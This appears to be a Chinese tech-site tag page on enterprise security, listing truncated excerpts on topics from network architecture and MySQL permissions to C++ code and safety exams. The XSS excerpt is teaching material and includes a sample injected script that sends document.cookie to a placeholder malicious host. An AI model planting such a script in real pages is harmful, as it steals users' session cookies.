草庐IT

企业安全

全部标签

安全自动化企业网络架构 (毕设分享)

一、前言:前段时间完成了自己的毕设项目——安全自动化企业网络架构。总的来说,该项目是一个对自己的挑战,其中涉及到Kubernetes容器云的搭建以及安全加固,DevOpsCI/CD部署容器化监控平台,Django自动化运维平台开发,基于Cisco的安全企业网络架构等技术能。完成该毕设的直接原因是因为自己技术学习比较广泛,但是很多方向深度和实践不够,需要通过一次实操进行整理和巩固。这里做一个简单的分享。Tips:限于实验设备的性能和可用的镜像,本次项目的内容仅能提供少量的实际参考价值。二、架构方案概述:系统架构的概述如图1所示。总体来说,整个系统架构可以分为以下两部分:DevOps/NetDev

c++ - 在回调函数中安全地删除调用者对象

库中的代码段:classClient{public:classCallBack{public:virtualvoidonData(Client*caller,std::string&data)=0;};Client(CallBack*callback):m_callBack(callback){}virtual~Client(){}voidonData(std::stringdata){m_callBack->onData(this,data);m_totalDataVol+=data.size();}private:CallBack*m_callBack;intm_totalData

2024全国危险化学品经营单位安全管理人员在线模拟

该模拟试题来源于安考汇公众号1、根据国家标准《危险货物运输包装类别划分方法》规定,除了爆炸品、气体、感染性物品和放射性物质等外,其他危险物按其呈现的危险程度,将危险品包装共分成三类包装。 正确答案:正确2、危险化学品生产单位在厂内销售本单位生产的危险化学品,不再办理经营许可证。 正确答案:正确参考解析:《危险化学品安全管理条例》第33条:依法设立的危险化学品生产企业在其厂区范围内销售本企业生产的危险化学品,不需要取得危险化学品经营许可。3、运输危险化学品的车、船和其它运输工具内允许搭乘无关人员。 正确答案:错误参考解析:《危险化学品安全管理条例》第48条通过道路运输危险化学品的,应当配备押运人

24个网络应用安全实操要点,全方位保护 Web 应用的安全

本文这份清单将介绍24个实操要点,让你全方位保护你的Web应用程序。各位看官,准备入坑啦!一、浏览器端的威胁防御1、用且仅用HTTPS,防范网络攻击众所周知,一个安全的应用需要对浏览器和Web服务器之间的所有连接进行加密。此外,建议禁用一些旧的密码套件和协议。使用HTTPS时,仅加密网站的“敏感”部分是不够的。如非这样,攻击者可以截获某个未加密的HTTP请求,然后伪造来自服务器的响应,返回恶意内容。幸运的是,HTTPS目前是很容易做到的。我们可以通过Let’sEncrypt免费获得证书,加上CertBot免费续期。继续我们的清单,下一个是HSTS它与HTTPS密切相关。2、使用HSTS和预加载

MySQL修炼手册14:用户权限管理:安全保障与数据隔离

目录写在开头1用户与权限的关系1.1用户的创建与删除1.1.1创建新用户1.1.2批量创建用户1.1.3安全删除用户1.2授予与撤销权限1.2.1授予权限1.2.2批量授予权限1.2.3撤销权限2角色的应用2.1创建与管理角色2.1.1创建角色2.1.2管理角色2.2将权限赋予角色2.2.1将权限赋予角色2.2.2用户与角色关联2.3示例演示2.3.1创建角色和分配权限2.3.2创建用户并关联角色2.4角色的优势与最佳实践3数据库层面的权限控制3.1数据库级权限管理3.1.1数据库创建与删除3.1.2数据库用户权限3.1.3安全性考虑与最佳实践3.2数据表级权限管理3.2.1数据表的创建与删除

轻型民用无人机驾驶航空器安全操控——理论考试多旋翼部分笔记

        今天已经可以在线考取轻型民用无人机驾驶航空器执照了,所以我也在在线观看完视频之后整理了如下的知识点,所有知识点全部来自UOM平台。      目录航空器知识(1)多旋翼民用无人驾驶航空器螺旋桨的作用(2)多旋翼民用无人驾驶航空器天线的作用(3)多旋翼民用无人驾驶航空器中的图传是什么?(4)在操作多旋翼民用无人驾驶航空器时,如何保证图传传输距离足够远?(5)多旋翼民用无人驾驶航空器遥控器摇杆的作用(6)常见的多旋翼民用无人驾驶航空器机头指示灯、状态指示灯的作用(7)多旋翼民用无人驾驶航空器视觉系统的作用(8)多旋翼民用无人驾驶航空器云台相机的作用(9)在常见的多旋翼民用无人驾驶航

ONLYOFFICE文档8.0全新发布:私有部署、卓越安全的协同办公解决方案

ONLYOFFICE文档8.0全新发布:私有部署、卓越安全的协同办公解决方案文章目录ONLYOFFICE文档8.0全新发布:私有部署、卓越安全的协同办公解决方案摘要📑引言🌟正文📚一、ONLYOFFICE文档概述📊二、ONLYOFFICE文档开发者版的主要特点🔍三、ONLYOFFICE文档企业版特色💼四、ONLYOFFICE8.0新特性一览🆕五、实践应用和集成案例📚六、如何获取和尝试试用ONLYOFFICE文档📥结论📌附录🔗摘要📑探索最新发布的ONLYOFFICE文档8.0版——一款集多功能于一体的办公软件。无论是开发者版还是企业版,ONLYOFFICE文档均提供了开源性、数据安全、跨平台兼容性

前端安全之XSS、CSRF

XSS(cross-site-script)跨站脚本攻击跨站脚本攻击是通过在网站中注入恶意代码,来达到劫取用户cookie信息,或者实施其他破坏行动。例如:一个网站如果没有针对XSS做响应的安全措施,而且它存在添加评论的功能,那么用户可以在添加评论时输入如下文本script> varxhr=newXMLHttpRequest(); xhr.open('GET','http://恶意网站.com/steal?cookie='+document.cookie,true); xhr.send()/script>当其他用户查看包含这个评论的页面时,他们的浏览器会执行这段恶意脚本,导致攻击者成功窃取他们

c++ - 放置新的 STL 容器并在之后安全地销毁它

这段代码实现了一个不受限制的union,它提供了通过名称和索引对其三个成员中的任何一个进行访问。由于std::string是非平凡构造和销毁的,我需要为union提供特殊的构造函数和析构函数。#include#includeusingnamespacestd;unionMyUnion{stringparts[3];struct{stringpart1,part2,part3;};MyUnion(){new(parts+0)string;//constructsthe3stringsin-placenew(parts+1)string;new(parts+2)string;}~MyUni

c++ - 如何安全地在 C++/Ocaml 之间转换树数据结构?

我有一个用C++编写的遗留数据结构和一个OCaml中的新工具,该工具有望处理该遗留数据。所以我需要将数据从前者导入/翻译到后者。数据以树的形式存在,通常由访问者处理。作为一个简单的例子,考虑这个最小的DSL:#includeusingnamespacestd;classintnode;classaddnode;structvisitor{virtualvoidvisit(constintnode&n)=0;virtualvoidvisit(constaddnode&n)=0;};structnode{virtualvoidaccept(visitor&v)=0;};structintn